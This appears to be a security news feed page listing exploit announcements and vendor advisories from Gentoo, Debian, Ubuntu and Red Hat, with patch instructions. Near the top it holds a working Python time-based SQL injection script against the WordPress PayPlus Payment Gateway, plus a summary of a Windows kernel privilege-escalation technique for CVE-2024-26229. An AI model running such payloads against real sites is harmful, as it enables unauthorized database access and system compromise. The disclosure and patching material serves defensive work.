This is a proof of concept exploit to bypass two factor authentication in Mailcow versions prior to 2024-07.

Mailcow TFA Authentication Bypass

A small firebeam (kaine's risc-v vm) plugin to exploit the CVE-2024-26229 vulnerability that utilizes a vulnerable IOCTL in csc.sys. The vulnerability is used to get kernel R/W memory access to corrupt the KTHREAD->PreviousMode and then to leveraging DKOM to achieve LPE by copying over the token from the system process over to the current process token.

Firebeam CVE-2024-26229 Plugin

WordPress PayPlus Payment Gateway plugin versions prior to 6.6.9 suffer from a remote SQL injection vulnerability.

    #!/usr/bin/env python3.11import requestsimport timedef exploit(url):    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}    start = time.time()    with requests.Session() as session:        session.headers.update({            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        })        response = requests.get(url, params=payload)        print(f"Exploiting {url}...")        end = time.time()        print(response.status_code)        response_time = end - start        print(f"Response time: {response_time}...")if __name__ == "__main__":    url = input("Enter the vulnerable URL (e.g., https://test.site): ")    if not url.startswith("http"):        url = "http://" + url    exploit(url)

WordPress PayPlus Payment Gateway SQL Injection

Gentoo Linux Security Advisory 202408-12 - A vulnerability has been discovered in Bitcoin, which can lead to a denial of service. Versions greater than or equal to 25.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Bitcoin: Denial of Service  
     Date: August 07, 2024  
     Bugs: #908084  
       ID: 202408-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Bitcoin, which can lead to a  
denial of service.

Background  
==========

Bitcoin Core consists of both "full-node" software for fully validating  
the blockchain as well as a bitcoin wallet.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-p2p/bitcoind  < 25.0        >= 25.0

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

Bitcoin Core, when debug mode is not used, allows attackers to cause a  
denial of service (CPU consumption) because draining the inventory-to-  
send queue is inefficient, as exploited in the wild in May 2023.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Bitcoin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/bitcoind-25.0"

References  
==========

[ 1 ] CVE-2023-33297  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33297

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-12

Debian Linux Security Advisory 5739-1 - user able to escalate to the netdev group can load arbitrary shared object files in the context of the wpa_supplicant process running as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5739-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 06, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : wpa  
CVE ID         : CVE-2024-5290

Rory McNamara reported a local privilege escalation in wpasupplicant: A  
user able to escalate to the netdev group can load arbitrary shared  
object files in the context of the wpa_supplicant process running as  
root.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2:2.9.0-21+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2:2.10-12+deb12u2.

We recommend that you upgrade your wpa packages.

For the detailed security status of wpa please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/wpa

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmaygRlfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QyKQ/+N0r1EUAN88sgtYvXYVc7h9EN1vZ0hvE6LGKfJDYyOGw+nXzDZWNwXBG5  
uzzKo/aR1hBoJQTHTb47A7xXuHvHQjjbt0l+n2q3WtmhG+QcSLSy1iFk5JwDQ6AD  
4U10+Hwfet0Lw13Qjd5ASXbEG70GYJ6bMPaP2C0O9vwEqpiyZRKhHuzbvS7FE0By  
Hz1aiS41wT3K2qAtXnDINAZGlAWuINz6eV3HubI/FUZ2DqpAky9xeP66WZ9EGDl9  
YZqz+o7ezzvruHSztOl0oC0m/8igytN1E6qaRiSk1TmwcLLBxqTO4q4maSIbqEjT  
M43Gr23njg2NO11EnAi6j/9tsBsuNY3v1nKZgPl9EsWTicUYwi7YJVEwsTGnX5JB  
910YbmzdXOWAUmkgeG6/m2oFFmuIZpS9cFjBr8NxVc1+nJZQCi7T7bxSADphLv5P  
1hfymG/Y6Xmbxjl54vU+jzB14oLNJxOwdqNH+9gvHRZFRlMWrQAlNVKLT3MEsbSp  
9PrFELAgmwprsMpihqW6EERCBST8MevAvEQkbcewZYA72RNOkjuZQZ/3SzMHnIqt  
Yy2GU2tmqNJTvyGzF6k0r9No9ZrEvFByxTytoZ48skad55kz1dJY0PJ3AHgM9jE0  
VzGh9i6vTrOCIhcEYPY6DhZK3tT0suV/hLdnDtT9GVQANeantwk=  
=nPu+  
-----END PGP SIGNATURE-----

Debian Security Advisory 5739-1

Ubuntu Security Notice 6945-1 - Rory McNamara discovered that wpa_supplicant could be made to load arbitrary shared objects by unprivileged users that have access to the control interface. An attacker could use this to escalate privileges to root.

==========================================================================  
Ubuntu Security Notice USN-6945-1  
August 06, 2024

wpa vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

wpa_supplicant could be made to run programs as an administrator with  
specially crafted configuration file.

Software Description:  
- wpa: client support for WPA and WPA2

Details:

Rory McNamara discovered that wpa_supplicant could be made to load  
arbitrary shared objects by unprivileged users that have access to  
the control interface. An attacker could use this to escalate privileges  
to root.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   wpasupplicant                   2:2.10-21ubuntu0.1

Ubuntu 22.04 LTS  
   wpasupplicant                   2:2.10-6ubuntu2.1

Ubuntu 20.04 LTS  
   wpasupplicant                   2:2.9-1ubuntu4.4

Ubuntu 18.04 LTS  
   wpasupplicant                   2:2.6-15ubuntu2.8+esm1

Ubuntu 16.04 LTS  
   wpasupplicant                   2.4-0ubuntu6.8+esm1

Ubuntu 14.04 LTS  
   wpasupplicant                   2.1-0ubuntu1.7+esm5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6945-1  
   CVE-2024-5290,https://launchpad.net/bugs/2067613

Package Information:  
   https://launchpad.net/ubuntu/+source/wpa/2:2.10-21ubuntu0.1  
   https://launchpad.net/ubuntu/+source/wpa/2:2.10-6ubuntu2.1  
   https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu4.4  
   https://launchpad.net/ubuntu/+source/wpa/2:2.6-15ubuntu2.8+esm1  
   https://launchpad.net/ubuntu/+source/wpa/2.4-0ubuntu6.8+esm1  
   https://launchpad.net/ubuntu/+source/wpa/2.1-0ubuntu1.7+esm5

Ubuntu Security Notice USN-6945-1

Gentoo Linux Security Advisory 202408-11 - Multiple vulnerabilities have been discovered in aiohttp, the worst of which could lead to service compromise. Versions greater than or equal to 3.9.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: aiohttp: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #918541, #918968, #931097  
       ID: 202408-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in aiohttp, the worst of  
which could lead to service compromise.

Background  
==========

aiohttp is an asynchronous HTTP client/server framework for asyncio and  
Python.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
dev-python/aiohttp  < 3.9.4       >= 3.9.4

Description  
===========

Multiple vulnerabilities have been discovered in aiohttp. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All aiohttp users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/aiohttp-3.9.4"

References  
==========

[ 1 ] CVE-2023-47641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-47641  
[ 2 ] CVE-2023-49082  
      https://nvd.nist.gov/vuln/detail/CVE-2023-49082  
[ 3 ] CVE-2024-30251  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30251

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-11

Gentoo Linux Security Advisory 202408-10 - Multiple vulnerabilities have been discovered in nghttp2, the worst of which could lead to a denial of service. Versions greater than or equal to 1.61.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: nghttp2: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #915554, #928541  
       ID: 202408-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in nghttp2, the worst of  
which could lead to a denial of service.

Background  
==========

Nghttp2 is an implementation of HTTP/2 and its header compression  
algorithm HPACK in C.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-libs/nghttp2  < 1.61.0      >= 1.61.0

Description  
===========

Multiple vulnerabilities have been discovered in nghttp2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All nghttp2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/nghttp2-1.61.0"

References  
==========

[ 1 ] CVE-2023-44487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44487  
[ 2 ] CVE-2024-28182  
      https://nvd.nist.gov/vuln/detail/CVE-2024-28182

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-10

Gentoo Linux Security Advisory 202408-9 - Multiple vulnerabilities have been discovered in Cairo, the worst of which a denial of service. Versions greater than or equal to 1.18.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Cairo: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #717778  
       ID: 202408-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Cairo, the worst of  
which a denial of service.

Background  
==========

Cairo is a 2D vector graphics library with cross-device output support.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
x11-libs/cairo  < 1.18.0      >= 1.18.0

Description  
===========

Multiple vulnerabilities have been discovered in Cairo. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Cairo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-libs/cairo-1.18.0"

References  
==========

[ 1 ] CVE-2019-6461  
      https://nvd.nist.gov/vuln/detail/CVE-2019-6461  
[ 2 ] CVE-2019-6462  
      https://nvd.nist.gov/vuln/detail/CVE-2019-6462

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-09

Red Hat Security Advisory 2024-5067-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include double free and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5067.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:5067-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5067  
Issue date:         2024-08-07  
Revision:           03  
CVE Names:          CVE-2022-48637  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: block: null pointer dereference in ioctl.c when length and logical block size are misaligned (CVE-2023-52458)

* kernel: ext4: regenerate buddy after block freeing failed if under fc replay (CVE-2024-26601)

* kernel: PM / devfreq: Synchronize devfreq_monitor_[start/stop] (CVE-2023-52635)

* kernel: bpf: Fix racing between bpf_timer_cancel_and_free and bpf_timer_cancel (CVE-2024-26737)

* kernel: bnxt: prevent skb UAF after handing over to PTP worker (CVE-2022-48637)

* kernel: ARM: 9359/1: flush: check if the folio is reserved for no-mapping addresses (CVE-2024-26947)

* kernel: scsi: qla2xxx: Fix double free of the ha->vp_map pointer (CVE-2024-26930)

* kernel: nouveau: lock the client object tree. (CVE-2024-27062)

* kernel: octeontx2-af: Use separate handlers for interrupts (CVE-2024-27030)

* kernel: vt: fix unicode buffer corruption when deleting characters (CVE-2024-35823)

* kernel: netfilter: validate user input for expected length (CVE-2024-35896)

* kernel: mlxbf_gige: stop interface during shutdown (CVE-2024-35885)

* kernel: netfilter: complete validation of user input (CVE-2024-35962)

* kernel: scsi: libfc: Fix potential NULL pointer dereference in fc_lport_ptp_setup() (CVE-2023-52809)

* kernel: i40e: fix vf may be used uninitialized in this function warning (CVE-2024-36020)

* kernel: rtnetlink: Correct nested IFLA_VF_VLAN_LIST attribute validation (CVE-2024-36017)

* kernel: net: core: reject skb_copy(_expand) for fraglist GSO skbs (CVE-2024-36929)

* kernel: drm/vmwgfx: Fix invalid reads in fence signaled events (CVE-2024-36960)

* kernel: ipvlan: Dont Use skb->sk in ipvlan_process_v{4,6}_outbound (CVE-2024-33621)

* kernel: blk-cgroup: fix list corruption from reorder of WRITE ->lqueued (CVE-2024-38384)

* kernel: blk-cgroup: fix list corruption from resetting io stat (CVE-2024-38663)

* kernel: SUNRPC: Fix UAF in svc_tcp_listen_data_ready() (CVE-2023-52885)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-48637

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2265794  
https://bugzilla.redhat.com/show_bug.cgi?id=2265836  
https://bugzilla.redhat.com/show_bug.cgi?id=2272808  
https://bugzilla.redhat.com/show_bug.cgi?id=2273274  
https://bugzilla.redhat.com/show_bug.cgi?id=2277831  
https://bugzilla.redhat.com/show_bug.cgi?id=2278167  
https://bugzilla.redhat.com/show_bug.cgi?id=2278248  
https://bugzilla.redhat.com/show_bug.cgi?id=2278387  
https://bugzilla.redhat.com/show_bug.cgi?id=2278473  
https://bugzilla.redhat.com/show_bug.cgi?id=2281190  
https://bugzilla.redhat.com/show_bug.cgi?id=2281675  
https://bugzilla.redhat.com/show_bug.cgi?id=2281700  
https://bugzilla.redhat.com/show_bug.cgi?id=2281916  
https://bugzilla.redhat.com/show_bug.cgi?id=2282669  
https://bugzilla.redhat.com/show_bug.cgi?id=2284400  
https://bugzilla.redhat.com/show_bug.cgi?id=2284417  
https://bugzilla.redhat.com/show_bug.cgi?id=2284496  
https://bugzilla.redhat.com/show_bug.cgi?id=2290408  
https://bugzilla.redhat.com/show_bug.cgi?id=2293657  
https://bugzilla.redhat.com/show_bug.cgi?id=2294220  
https://bugzilla.redhat.com/show_bug.cgi?id=2294225  
https://bugzilla.redhat.com/show_bug.cgi?id=2297730

Latest News